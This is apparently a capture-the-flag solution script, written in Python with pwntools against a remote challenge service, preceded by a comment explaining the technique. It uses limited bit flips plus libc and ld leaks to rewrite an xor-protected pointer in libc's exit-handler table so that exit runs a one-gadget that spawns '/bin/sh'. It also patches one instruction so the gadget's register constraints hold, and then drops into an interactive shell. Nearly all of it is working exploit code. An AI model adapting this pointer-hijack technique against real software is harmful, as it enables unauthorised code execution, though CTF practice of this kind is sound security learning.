"""
we get 1 bitflip in any libc location and 9 bitflips in any r/w section, with free libc + ld leak.
we flip bits in libc's exit handler function table, which contains "encrypted" (xored) pointers to functions.
we know the original function pointer before encryption is _dl_fini from ld (whose address we know from the free ld leak).
because it's xor and our primitive is to flip bits, we don't care about the xor key, just that our target function and the address of _dl_fini differ in 9 bits or less.
there are a few one gadgets, but most of them are not nice because of stack constraints that didn't hold while testing (also not always fixable via any potentially remaining 1-2 bitflips), there's a nicer one which only needs rcx and r9 to be zero.
it depends on aslr if this gadget has 9 or less different bits from _dl_fini so we had to re-run the exploit a few times.
r9 is already 0, but rcx is 1 when our target function is called.
here we use the first bitflip we get in libc (including executable sections) to change the mov rcx, 1 into mov rcx, 0 just before the __run_exit_handlers function is called in exit

- xlr8or
"""

from pwn import *
import sys

context.terminal = 'st'

libc = ELF('./libc.so.6', checksec=False)
ld = ELF('./ld-linux-x86-64.so.2', checksec=False)
elf1 = ELF('./rooftop', checksec=False)
elf2 = ELF('./stairwell', checksec=False)

# wrapper for unpack(xyz, 'all')
def u(num, endian=None, sign=None):
    return unpack(num, 'all', endian=endian, sign=sign)

# p = process('./run')
p = remote('chall.polygl0ts.ch', 6008)

def do_flip(addr, bit_idx):
    p.sendlineafter(b'X coordinate:', hex(addr).encode())
    p.sendlineafter(b'Y coordinate:', hex(bit_idx).encode())

for _ in range(7):
    p.sendlineafter(b'>', b'')

# flips `mov rcx, 1` into `mov rcx, 0` in libc.exit before the exit handlers are called
# this is required so that our onegadget's constraints are satisfied
off = 0x3e334+1 # libc.exit + 5
do_flip(off, 0x00)

for _ in range(8):
    p.sendlineafter(b'>', b'')

leaks = p.recvuntil(b'>')
libc.address = u(leaks[:8]) - libc.sym['read']
ld_leak = u(leaks[9:17])
ld.address = ld_leak - 0x36000
print('libc leak', hex(libc.address))
print('ld leak', hex(ld.address))

def bit_diff(a, b):
    a = bin(a)[2:]
    b = bin(b)[2:]

    arr = []
    diff_cnt = 0
    for i in range(len(a)):
        if a[i] != b[i]:
            diff_cnt += 1
            arr.append(len(a)-1-i)

    print(diff_cnt)
    return arr

flip_loc = libc.sym['initial'] + 24
gads = [0xd8131, 0xf4b22, 0xf4b2a, 0xf4b2f]

for g in gads:
    bit_diff(libc.address + g, ld.sym['_dl_fini'])

# 0xd8131 execve("/bin/sh", rcx, r9)
# constraints:
  # [rcx] == NULL || rcx == NULL || rcx is a valid argv
  # [r9] == NULL || r9 == NULL || r9 is a valid envp

diffs = bit_diff(libc.address + gads[0], ld.sym['_dl_fini'])
if len(diffs) > 9: sys.exit(1)
print('OG', hex(libc.address + 0xf4b22))
print('dl fini', hex(ld.sym['_dl_fini']))

p.sendline(b'')
for _ in range(2):
    p.sendlineafter(b'>', b'')

print(diffs)
for x in diffs:
    k = (x + 17)%64
    byt_idx = k//8
    bit_idx = k%8
    do_flip(flip_loc + byt_idx, bit_idx)
    # pause()

for x in range(9 - len(diffs)):
    do_flip(libc.bss(0x00), 1)

p.interactive()
